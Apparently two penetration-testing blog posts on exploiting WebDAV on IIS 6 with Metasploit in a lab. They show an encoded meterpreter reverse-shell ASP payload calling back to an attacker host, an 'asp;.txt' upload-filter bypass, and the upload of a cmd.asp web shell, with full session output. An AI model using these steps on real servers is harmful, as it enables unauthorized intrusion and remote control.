More with Metasploit and WebDAV

intro..webdav stuff...lazy...

To get yourself a test environment you can follow this tutorial, its not bad. You'll want to make sure you pay attention to the part about allowing your IUSR_WHATEVER account to have have write access or you can set up a windows account to use authentication.

metasploit has a few modules to test for webDAV presence.

webdav_scanner:

msf auxiliary(webdav_scanner) > run

[*] 192.168.242.134 (Microsoft-IIS/6.0) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

webdav_internal_ip

msf auxiliary(webdav_internal_ip) > run

[*] Found internal IP in WebDAV response (192.168.242.134) 192.168.242.134
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

webdav_website_content

msf auxiliary(webdav_website_content) > run
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/iisstart.htm
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/pagerror.gif
[*] Found file or directory in WebDAV response (192.168.242.134) http://domino/davaroo/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The important one there is the davaroo directory if someone has shared out the root directory it will usually just look like this:

[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/

Or if you have the path wrong

msf auxiliary(webdav_test) > run

[*] 192.168.242.134/DAV/ has DAV DISABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

If we need to see what options are allowed, you can use the http options auxiliary module.

msf auxiliary(options) > run

[*] 192.168.242.134 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

to see if you can upload things quickly you can give DAVtest a try or Ryan Linn's webdav_test module.

msf auxiliary(webdav_test) > run

[*] 192.168.242.134/davaroo/ has DAV ENABLED
[*] Attempting to create /davaroo/WebDavTest_111vO5Ats7
[*] 192.168.242.134/davaroo/ is WRITEABLE
[*] Trying /davaroo/WebDavTest_111vO5Ats7/9RiwStjSE7bI4dv.html
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pd84WuxboP6ZvcN.jhtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/Lqy4HqgiNoqS9YQ.php
[*] Trying /davaroo/WebDavTest_111vO5Ats7/y2QL82GmZvFHv0U.txt
[*] Trying /davaroo/WebDavTest_111vO5Ats7/W2CNVzATLpt9XeU.cgi
[*] Trying /davaroo/WebDavTest_111vO5Ats7/acl1gOJlmSu5fXf.pl
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pKR4pLVcDpcPCnB.jsp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/KWj69GgzXIHrR0j.aspx
[*] Trying /davaroo/WebDavTest_111vO5Ats7/1ImlpmATPINV2Zj.asp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/OT0B3cOEFLgnIGB.shtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/yGSr7GVoEmjcQCf.cfm
[*] Attempting to cleanup /davaroo/WebDavTest_111vO5Ats7
[*] Uploadable files are: html,jhtml,php,txt,cgi,pl,jsp,aspx,cfm
[*] Executable files are: html,txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

What you'll probably run into here is the INABILITY to upload executable content or anything otherwise useful on the box. in this case i can upload php, cgi, jsp, aspx, but nothing is there to execute any of that content.

If you try to upload an .asp you'll get a 403 forbidden or if you try to COPY/MOVE a .txt to .asp you'll get a forbidden. :-(

Thankfully there is a "feature" of 2k3 that allows you to upload evil.asp;.txt and that will bypass the filter.

So we generate out evil.asp file using msfpayload and msfencode, you could also use any other asp shell too...

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.94 LPORT=443 R |
./msfencode -t asp -o tcp443meterp.asp
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

upload it and rename it

dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt
Uploading tcp443meterp.asp to `/davaroo/tcp443meterp.txt':
Progress: [=============================>] 100.0% of 314810 bytes succeeded.
dav:/davaroo/> copy tcp443meterp.txt tcp443meterp.asp;.txt
Copying `/davaroo/tcp443meterp.txt' to `/davaroo/tcp443meterp.asp%3b.txt':  succeeded.
dav:/davaroo/> exit

now you can browse to the page at ip/tcp443meterp.asp;.txt and get your shell

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.6.94:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.6.94
[*] Meterpreter session 1 opened (192.168.6.94:443 -> 192.168.242.134:49306)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: 6
meterpreter > sysinfo
Computer: WebDAVRulez
OS      : Windows .NET Server (Build 3790, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > run migrate -f notepad.exe
[*] Current server process: svchost.exe (1792)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 312
[*] New server process: notepad.exe (312)
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

What I ran into was that your shell came back with a less than desirable privilege (Network Service). You'll have to work the local angle to elevate but at least you have a shell.

more info here: http://blog.metasploit.com/2009/12/exploiting-microsoft-iis-with.html

Resources:
cadaver: http://www.webdav.org/cadaver/
DAVtest: http://security.sunera.com/2010/04/davtest-quickly-test-exploit-webdav.html
Ryan Linn's port of DAVtest to metasploit: http://trac.happypacket.net/browser/msfmods/trunk/modules/auxiliary/scanner/http/webdav_test.rb

Creating a HTTP OPTIONS auxiliary module for Metasploit

Inspired by HD's HTTP version auxiliary module i wanted to see if i could get one going that would be pull down the HTTP Verbs allowable on a web server.

Basically i wanted to do:

cg@segfault:~/evil/msf3$ nc 192.168.0.109 80
OPTIONS * HTTP/1.0

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Aug 2007 05:18:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 0
Accept-Ranges: bytes
DASL:
DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Cache-Control: private

cg@segfault:~/evil/msf3$

but with a metasploit auxiliary module. so i got it going... mostly HD's module but i changed what needed to be changed to get it to work.

cg@segfault:~/evil/msf3$ ./msfconsole

____________
<>
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ msf v3.1-dev
+ -- --=[ 215 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS 192.168.0.109
RHOSTS => 192.168.0.109
msf auxiliary(options) > run
[*] 192.168.0.109 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS www.carnal0wnage.com
RHOSTS => www.carnal0wnage.com
msf auxiliary(options) > run
[*] 69.64.54.104 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Auxiliary module execution completed
msf auxiliary(options) >

i'll post the code on carnal0wnage when i get off my butt and a little something something that gives you a status if you are scanning a Class C.

**more on getting code on the box once you find a PUT

cg@segfault:~$ curl -T test.txt http://192.168.0.109/test.txt http://192.168.0.109

then you have to do a MOVE or COPY request. personally i was having issues getting a MOVE request to work with a netcat connection, so i used...

**UPDATE
it ended up being the carriage returns (or lack thereof) that was causing me to get a 400 Bad Request error. I couldnt get the MOVE command to work, but the COPY command did.

cadaver http://www.webdav.org/cadaver/

cg@segfault:~$ cadaver
dav:!> open http://192.168.0.109
dav:/> put upload.asp
Uploading upload.asp to `/upload.asp':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 492 bytes succeeded.
dav:/> copy upload.txt upload.asp
Copying `/upload.txt' to `/upload.asp': succeeded.
dav:/> put upload.inc
Uploading upload.inc to `/upload.inc':
Progress: [=============================>] 100.0% of 5062 bytes succeeded.
dav:/> exit

from there you will want to upload your cmd.asp so you can execute commands on the box.


Browsing to upload.asp and uploading our cmd.asp (cmdx.aspx)



Interacting with out cmdx.aspx to list the directory contents of the C drive


-CG